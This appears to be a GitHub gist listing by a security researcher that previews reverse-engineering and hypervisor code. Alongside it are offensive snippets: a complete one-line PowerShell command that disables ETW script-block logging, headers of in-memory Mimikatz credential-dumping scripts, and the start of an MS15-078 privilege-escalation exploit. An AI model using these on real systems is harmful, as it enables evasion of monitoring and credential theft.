Satoshi Tanda tandasat

tandasat / list_first_instruction.py
Created Jun 26, 2021
IDA script to show the first instruction of all functions
View list_first_instruction.py
from idautils import *
from idaapi import *
from idc import *

# Walk every function IDA has recognized and print the first instruction of
# each of its chunks (a function may consist of several non-contiguous chunks).
for funcea in Functions():
    functionName = get_func_name(funcea)
    for (startea, endea) in Chunks(funcea):
        print(f"{startea:08x} {GetDisasm(startea)} : {functionName}")
tandasat / CheckGuestVmcsFieldsForVmEntry.c
Last active Jul 24, 2021
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
View CheckGuestVmcsFieldsForVmEntry.c
/**
* @file CheckGuestVmcsFieldsForVmEntry.c
* @author Satoshi Tanda (tanda.sat@gmail.com)
* @brief Checks validity of the guest VMCS fields for VM-entry as per
* 26.3 CHECKING AND LOADING GUEST STATE
* @version 0.1
* @date 2021-02-20
*
* @details This file implements part of checks performed by a processor during
* VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit
View GuestAgent.c
/*!
@file GuestAgent.c
@brief GuestAgent code.
@author Satoshi Tanda
@copyright Copyright (c) 2020 - , Satoshi Tanda. All rights reserved.
*/
#include "GuestAgent.h"
View Invoke-BypassingMimikatz.ps1
#
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
tandasat / KillETW.ps1
Last active Oct 29, 2022
Disable ETW of the current PowerShell session
View KillETW.ps1
#
# This PowerShell command sets System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled to 0,
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging, for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
View Invoke-Mimikidz
function Invoke-Mimikidz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
tandasat / elevator.c
Created Apr 27, 2016 — forked from sh1n0b1/elevator.c
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
View elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"
//include OTF
#include "font.h" // foofont is fetched from loader config struct
//#include "cert.h"
tandasat / ch3_answers.c
Created Nov 21, 2014
(Suspended) Answers to exercises in Practical Reverse Engineering Chapter 3
View ch3_answers.c
Suspended because of another project.
///////////////////////////////////////////////////////////////////////////////
//
// p123
//
I used Windows 8 kernel version 16628.
//////////////////////////////// 1-6
tandasat / ch1_answers.c
Created Nov 19, 2014
Answers to exercises in Practical Reverse Engineering Chapter 1
View ch1_answers.c
///////////////////////////////////////////////////////////////////////////////
//
// p11
//
//////////////////////////////// 1
; ASM
edi = s->0x8_charp
edx = edi
eax = 0
View run.bat
set TARGET_BXRC=bochsrc2.4.6
set BXSHARE=C:\Program Files (x86)\Bochs-2.4.6
set IDABASE=C:\Program Files (x86)\IDA
"%IDABASE%\idaq.exe" -c -A -OIDAPython:mbr.py %TARGET_BXRC%.bxrc
"%IDABASE%\idaq.exe" -rbochs %TARGET_BXRC%.idb